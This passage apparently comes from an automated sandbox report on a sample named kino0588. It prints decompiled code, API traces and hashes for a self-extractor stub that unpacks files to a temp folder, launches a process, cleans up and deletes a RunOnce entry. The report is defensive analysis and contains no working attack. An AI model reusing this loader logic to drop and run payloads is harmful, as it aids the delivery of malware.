				if(_t20 != 0) {
					E00B81680(_t20, _t36, _t33);
					E00B8658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xb89124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00B844B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xb89124 = E00B86285();
					_t14 = 0;
				}
				return _t14;
			}

0x00b858cd
0x00b858d1
0x00b858d3
0x00b858d5
0x00b858d8
0x00b858d8
0x00b858da
0x00b858db
0x00b858e1
0x00b858ed
0x00b858f1
0x00b8591e
0x00b8592c
0x00b85943
0x00b8594a
0x00b8594d
0x00b85953
0x00b85959
0x00000000
0x00b8595b
0x00b8595c
0x00b85963
0x00b8596c
0x00000000
0x00b85972
0x00b85974
0x00b8597a
0x00b8597a
0x00b8596c
0x00b858f3
0x00b85901
0x00b85906
0x00b8590b
0x00b85910
0x00b85910
0x00b85918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00B85534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B858E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00B85534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85943
LocalFree.KERNEL32(00000000,?,00B85534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8594D
CloseHandle.KERNEL32(00000000,?,00B85534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00B85534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85963

Strings

TMP4351$.TMP, xrefs: 00B85923
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B858CD, 00B858CF, 00B85919, 00B85962

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
API String ID: 747627703-3228030758
Opcode ID: ecc5bf3a175bed31f03b8f0028a75c5fc27357062e124e7793d4a5458c459ca0
Instruction ID: ee6bd961262db61185455a4ecc168d9c4312c5df3dffaf2d8ca1f02c42fbb03b
Opcode Fuzzy Hash: ecc5bf3a175bed31f03b8f0028a75c5fc27357062e124e7793d4a5458c459ca0
Instruction Fuzzy Hash: 42112271600210BBD7207FB9AC4DAAB7FDDDF46360B100A96F50AE32B1DE749806C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B83FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00B83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xb88004; // 0xfbc33aab
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00B86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xb89124 = E00B86285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E00B844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xb88a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xb89a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xb89a2c = _t44;
						}
					}
				}
				E00B8411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xb89a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00b83fef
0x00b83ffa
0x00b84001
0x00b84008
0x00b8400a
0x00b8400b
0x00b84010
0x00b8410a
0x00b8411a
0x00b8411a
0x00b8401c
0x00b8401d
0x00b8401e
0x00b8401f
0x00b84033
0x00b8403b
0x00b840ca
0x00b840e9
0x00b840f8
0x00b84101
0x00b84106
0x00b84106
0x00b84108
0x00b84108
0x00000000
0x00b84108
0x00b84049
0x00b8405c
0x00b84062
0x00b84068
0x00b8406e
0x00b84070
0x00b84077
0x00b8407f
0x00b84089
0x00b8408b
0x00b8408b
0x00b84089
0x00b84077
0x00b84091
0x00b8409c
0x00b840a8
0x00b840b8
0x00000000
0x00b840c2
0x00000000
0x00b840c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00B84033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B84049
GetExitCodeProcess.KERNELBASE ref: 00B8405C
CloseHandle.KERNEL32(?), ref: 00B8409C
CloseHandle.KERNEL32(?), ref: 00B840A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00B840DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00B840E9

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: eb6fab6d676b9a6b248d6151effba615207308d740b9800a442a730f96303e5d
Instruction ID: f4bb1acebbb5e1caab4cba19464fab9fec00f5491743c2bfa2eaec5cd5bc0ac0
Opcode Fuzzy Hash: eb6fab6d676b9a6b248d6151effba615207308d740b9800a442a730f96303e5d
Instruction Fuzzy Hash: B0318031641219ABEB20BF65DC4DFABBBBCEB95711F1001AAF605E61B1CB304D85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B851E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B851E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00B8468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00B8468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00B844B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xb89124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xb89124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00B844B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xb89124 = 0x80070714;
					goto L10;
				}
				E00B844B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xb89124 = E00B86285();
				goto L10;
			}

0x00b851fb
0x00b85207
0x00b8520b
0x00b8523c
0x00b85268
0x00b85270
0x00b8528b
0x00b85293
0x00b8529c
0x00b852a6
0x00b852b0
0x00000000
0x00b852b0
0x00b8529e
0x00b85279
0x00000000
0x00b8527b
0x00b85273
0x00000000
0x00b85273
0x00b8524a
0x00b85250
0x00b85256
0x00000000
0x00b85256
0x00b85219
0x00b85223
0x00000000

APIs

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00B82F4D,?,00000002,00000000), ref: 00B85201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00B85250

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Part of subcall function 00B86285: GetLastError.KERNEL32(00B85BBC), ref: 00B86285

Strings

<None>, xrefs: 00B85262
UPROMPT, xrefs: 00B851EF, 00B85230

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 2e5a78f90a29bc30da5444db828fae24f58bf51fbaccd030e349b14af066a63c
Instruction ID: 5355ec64e206380f48939f92f87fc279184715d5c64ce0c9b46dc43a8494ecb6
Opcode Fuzzy Hash: 2e5a78f90a29bc30da5444db828fae24f58bf51fbaccd030e349b14af066a63c
Instruction Fuzzy Hash: DA11E671201202BBE7247FB55C89B3B61DDDB89350B1444ADF642E62B0DEB89C01C335

Uniqueness

Uniqueness Score: -1.00%

Function 00B852B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xb88004; // 0xfbc33aab
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xb891e0; // 0x2ef8de8
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xb88a24 == 0 &&  *0xb89a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xb88a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xb88a24 == 0 &&  *0xb89a30 == 0) {
					_push(_t22);
					E00B81781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
					if(( *0xb89a34 & 0x00000020) != 0) {
						E00B865E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00B82390( &_v268);
					_t11 =  *0xb88a20; // 0x0
				}
				if( *0xb89a40 != 1 && _t11 != 0) {
					_t11 = E00B81FE1(_t22); // executed
				}
				 *0xb88a20 =  *0xb88a20 & 0x00000000;
				return E00B86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x00b852b6
0x00b852b6
0x00b852b6
0x00b852c1
0x00b852c8
0x00b852cb
0x00b852cc
0x00b852d4
0x00b852d6
0x00b852d7
0x00b852de
0x00b852e0
0x00b852f2
0x00b852fa
0x00b852fa
0x00b85302
0x00b85305
0x00b8530c
0x00b85312
0x00b85316
0x00b85316
0x00b85317
0x00b8531c
0x00b8531f
0x00b85333
0x00b85345
0x00b85351
0x00b85359
0x00b85359
0x00b85363
0x00b85369
0x00b8536f
0x00b85374
0x00b85374
0x00b85381
0x00b85387
0x00b85387
0x00b8538f
0x00b853a0

APIs

SetFileAttributesA.KERNELBASE(02EF8DE8,00000080,?,00000000), ref: 00B852F2
DeleteFileA.KERNELBASE(02EF8DE8), ref: 00B852FA
LocalFree.KERNEL32(02EF8DE8,?,00000000), ref: 00B85305
LocalFree.KERNEL32(02EF8DE8), ref: 00B8530C
SetCurrentDirectoryA.KERNELBASE(00B811FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00B85363

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B85334

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 2833751637-2493987848
Opcode ID: 12db3afa6ff80537ef9a70051ca7cd943e688b2f43315d756f4abbb3b7ac16a9
Instruction ID: 156d27ef9a59ea1ac7f5c874ab8488972954e1cb47a0dd92d3113d1808473bc0
Opcode Fuzzy Hash: 12db3afa6ff80537ef9a70051ca7cd943e688b2f43315d756f4abbb3b7ac16a9
Instruction Fuzzy Hash: BB21AC31911604DBDB35BB24EC49BA977F4FB00790F4801AAE8836B1B0CFB09C88CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00B81FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B81FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xb88530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00b81fee
0x00b82005
0x00b8200d
0x00b82017
0x00000000
0x00b82020
0x00b8200d
0x00b82029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00B8538C,?,?,00B8538C), ref: 00B82005
RegDeleteValueA.KERNELBASE(00B8538C,wextract_cleanup3,?,?,00B8538C), ref: 00B82017
RegCloseKey.ADVAPI32(00B8538C,?,?,00B8538C), ref: 00B82020

Strings

wextract_cleanup3, xrefs: 00B81FE7, 00B8200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00B81FFB

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
API String ID: 849931509-2968168367
Opcode ID: f9ad1ee42da543daa1be307d9ba4a539856b313de308636b0747dba7f307ff7b
Instruction ID: 0d69ac43f8349c583940018aaf5e07eb571989f2a9532959d511c8e2745e9204
Opcode Fuzzy Hash: f9ad1ee42da543daa1be307d9ba4a539856b313de308636b0747dba7f307ff7b
Instruction Fuzzy Hash: 53E04F30950318BBE722ABD0EC0AF597BA9E701741F6001D5B904A2070EF615A14D705

Uniqueness

Uniqueness Score: -1.00%

Function 00B84CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B84CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xb88004; // 0xfbc33aab
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xb891d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00B84E99(_t75);
						L35:
						return E00B86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xb88584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xb891e4;
						_t58 = 0xb891e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xb891e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xb891e4;
						_t30 = E00B84702( &_v268, 0xb891e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00B8476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00B84980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00B847E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xb893f4 =  *0xb893f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xb891e4;
						_t63 = 0xb891e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xb891e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xb891e4;
						_t30 = E00B84702( &_v268, 0xb891e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00B84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00B84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00B84B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00b84cd0
0x00b84cdb
0x00b84ce0
0x00b84ce2
0x00b84cee
0x00b84cf2
0x00b84d0e
0x00b84d0e
0x00b84d11
0x00b84e83
0x00b84e88
0x00b84e98
0x00b84e98
0x00b84d17
0x00b84d17
0x00b84d1a
0x00b84d2f
0x00b84d2f
0x00000000
0x00b84d2f
0x00b84d1c
0x00b84d1c
0x00b84d1f
0x00b84dcb
0x00b84dd0
0x00b84dd2
0x00b84ddd
0x00b84ddd
0x00b84de3
0x00b84de8
0x00b84ded
0x00b84ded
0x00b84def
0x00b84df0
0x00b84df0
0x00b84df4
0x00b84df4
0x00b84df6
0x00b84df9
0x00b84dfc
0x00b84dfc
0x00b84dfe
0x00b84dff
0x00b84dff
0x00b84e03
0x00b84e08
0x00b84e0a
0x00b84e0f
0x00b84d03
0x00b84d03
0x00000000
0x00b84d03
0x00b84e18
0x00b84e20
0x00b84e25
0x00b84e27
0x00000000
0x00000000
0x00b84e33
0x00b84e38
0x00b84e3a
0x00000000
0x00000000
0x00b84e40
0x00b84e51
0x00b84e56
0x00b84e5b
0x00b84e5e
0x00000000
0x00000000
0x00b84e6a
0x00b84e6f
0x00b84e71
0x00000000
0x00000000
0x00b84e77
0x00b84e7d
0x00000000
0x00b84e7d
0x00b84d25
0x00b84d25
0x00b84d28
0x00b84d36
0x00b84d3b
0x00b84d40
0x00b84d40
0x00b84d42
0x00b84d43
0x00b84d43
0x00b84d47
0x00b84d4a
0x00b84d4a
0x00b84d4c
0x00b84d4f
0x00b84d4f
0x00b84d51
0x00b84d52
0x00b84d52
0x00b84d56
0x00b84d5b
0x00b84d5d
0x00b84d62
0x00000000
0x00000000
0x00b84d67
0x00b84d6f
0x00b84d74
0x00b84d76
0x00000000
0x00000000
0x00b84d7c
0x00b84d84
0x00b84d89
0x00b84d8b
0x00000000
0x00000000
0x00b84d94
0x00b84d99
0x00b84d9e
0x00b84da1
0x00b84daa
0x00b84daa
0x00b84da3
0x00b84da3
0x00b84da3
0x00b84db5
0x00b84dbb
0x00b84dbd
0x00000000
0x00b84dc3
0x00b84dc5
0x00000000
0x00b84dc5
0x00b84dbd
0x00b84d2a
0x00b84d2a
0x00b84d2d
0x00000000
0x00000000
0x00000000
0x00b84d2d
0x00b84cf8
0x00b84cfd
0x00b84d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00B84DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00B84DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B84D36, 00B84DE3

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 3625706803-2493987848
Opcode ID: b1d29141c40d968fd70334b411db52258faebcabfe3a91cf70829225b977f5b1
Instruction ID: b82bd0939dbc252436fc553d0e8ed155ddcaa661d36c51f0c308a8282c8bf95a
Opcode Fuzzy Hash: b1d29141c40d968fd70334b411db52258faebcabfe3a91cf70829225b977f5b1
Instruction Fuzzy Hash: C741E3362041079BCB25BF28DD546BA73E5EB45300F1846F9E886972B5DF31DE4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 00B84C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B84C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xb88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xb88d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00b84c40
0x00b84c4a
0x00b84c8d
0x00000000
0x00b84c70
0x00b84c70
0x00b84c7e
0x00b84c86
0x00000000
0x00000000
0x00000000
0x00b84c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00B84C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B84C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B84C7E

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 094c7338199078d3a74f693a513f08ff59b545ee6af7ab15d28e9e02442076b5
Instruction ID: 6938e07c3519202cfb7a50ff6e819e9d067d92373b7df9033e80b4a061d2f869
